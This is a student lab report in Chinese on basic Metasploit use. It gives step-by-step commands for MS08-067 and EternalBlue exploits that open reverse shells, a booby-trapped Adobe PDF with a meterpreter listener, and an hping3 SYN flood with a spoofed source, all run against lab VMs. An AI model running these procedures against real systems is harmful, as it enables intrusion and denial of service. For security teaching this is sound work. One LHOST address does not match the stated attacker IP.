20165306 Exp5 MSF基礎應用
Exp5 MSF基礎應用
一、實踐概述
1. 實踐內容
本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。實現:
1.1一個主動攻擊實踐
- ms08-067+windows/shell_reverse_tcp
1.2 一個針對瀏覽器的攻擊
- ms17_010_eternalblue+generic/shell_reverse_tcp
1.3 一個針對客戶端的攻擊
- Adobe+windows/meterpreter/reverse_tcp
1.4 成功應用任何一個輔助模塊
- dos/tcp/synflood(唯一)
2.基礎問題回答
用自己的話解釋什麽是exploit,payload,encode.
- exploit:測試者利用系統、程序或服務的漏洞進行攻擊的一個過程。
- payload:攻擊者在目標系統上執行的一段攻擊代碼,該代碼具有反彈連接、創建用戶、執行其他系統命令的功能。
- encode:一是為了避免使攻擊載荷不能完整運行的“壞字符”,二是為了改變特征碼,幫助攻擊載荷避免被殺軟發現。
二、實驗步驟
任務一 Windows服務滲透攻擊——MS08-067安全漏洞
攻擊機Kali:10.1.1.169
靶機Win2000:10.1.1.154
payload:windows/shell_reverse_tcp
1.攻擊機和靶機改成橋接模式,相互ping通
2.msfconsole
進入控制臺
search ms08-067
3.如上圖,輸入use exploit/windows/smb/ms08_067_netapi
指令選擇漏洞
show options
查看設置信息
set RHOSTS 10.1.1.154
設置Win2000 IP
search portscan
搜索端口
4.如上圖,輸入use auxiliary/scanner/portscan/tcp
選擇漏洞
show options
查看設置信息
set RHOSTS 10.1.1.154
exploit
看到445端口開放
5.輸入use exploit/windows/smb/ms08_067_netapi
show payloads
查看可用payload
如上圖,輸入set payload windows/shell_reverse_tcp
show options
exploit
進行攻擊成功
任務二 一個針對瀏覽器的攻擊——ms17-010
攻擊機Kali:192.168.43.91
靶機Win7專業版:192.168.43.182
payload:generic/shell_reverse_tcp
1.攻擊機和靶機改成橋接模式,關閉防火墻,相互ping通
2.msfconsole
進入控制臺
search ms17-010
查找漏洞
3.如上圖,輸入use exploit/windows/smb/ms17_010_eternalblue
指令選擇漏洞
show payloads
顯示可用攻擊載荷
set payload generic/shell_reverse_tcp
選擇攻擊載荷
show options
查看配置信息
set LHOSTS 192.168.43.91
設置Kali IP
set RHOSTS 192.168.43.182
設置Win7 IP
exploit
進行攻擊成功
任務三 一個針對客戶端的攻擊——Adobe
攻擊機Kali:10.1.1.169
靶機WinXPattacker:10.1.1.194
payload:windows/meterpreter/reverse_tcp
1.攻擊機和靶機改成橋接模式,相互ping通
2.msfconsole
進入控制臺
search adobe
查找漏洞
3.如下圖,輸入use windows/fileformat/adobe_cooltype_sing
指令選擇漏洞
show payloads
顯示可用攻擊載荷
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.169
設置Kali IP
set LPORT 5306
設置攻擊端口
set FILENAME 5306.pdf
設置生成的pdf文件名
exploit
4.開啟一個新終端
cd /root/.msf4/local
進入pdf文件保存目錄
cp 5306XYH.pdf /mnt/hgfs/XYH
把pdf文件復制到與主機的共享文件夾中,再把pdf從主機拖到winXP
5.回到原控制臺
back
退出當前模塊
use exploit/multi/handler
進入監聽模塊
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.169
設置kali IP
set LPORT 5306
設置攻擊端口
exploit
開始監聽
6.WinXP中打開5306XYH.pdf
回到Kali發現回連成功
任務四 成功應用任何一個輔助模塊
攻擊機Kali:10.1.1.169
靶機Win7:10.1.1.113
漏洞:dos/tcp/synflood(唯一)
1.攻擊機和靶機改成橋接模式,相互ping通
2.msfconsole
進入控制臺
show auxiliary
命令顯示所有的輔助模塊以及他們的用途
一眼相中TCP SYN FLOODER
3.SYN Flood攻擊原理
SYN:同步序列編號(Synchronize Sequence Numbers),是TCP/IP建立連接時使用的握手信號。
SYN Flood利用TCP協議缺陷,通過一定的操作破壞TCP三次握手建立正常連接,占用並耗費系統資源,使得被攻擊方資源耗盡,無法及時回應或處理正常的服務請求。
攻擊原理:通常,客戶端在短時間內偽造大量不存在的IP地址,向服務器不斷地發送syn包,服務器回復確認包,在進行第三次握手時,服務器等待客戶的確認,由於源地址是不存在的,服務器需要不斷的重發直至超時,才將此條目從未連接隊列刪除。這些偽造的SYN包將長時間占用未連接隊列,正常的SYN請求不能進去以及被丟棄,目標系統運行緩慢,引起網絡擁堵。
4.Win7下按Ctrl+Alt+Ins
啟動任務管理器
查看性能
,監控CPU的利用率,開啟Wireshark抓包
5.Kali中輸入hping3 -q -n -a 5.3.0.6 -S -s 5306 --keep -p 445 --flood 10.1.1.113
其中5.3.0.6為偽造源IP,5306為偽造源端口,445為目的端口,10.1.1.113為目的IP
6.查看Win7的任務管理器和wireshark抓包結果
如圖,Win7的性能利用率已經達到99%並居高不下。Wireshark抓到的包顯示大量源地址為5.3.0.6,在給靶機win7發送請求連接,進行SYN Flood攻擊。綜上表明已經攻擊成功。
7.Kali中按Ctrl+C
結束攻擊
查看Win7的任務管理器,性能利用率恢復正常。
20165306 Exp5 MSF基礎應用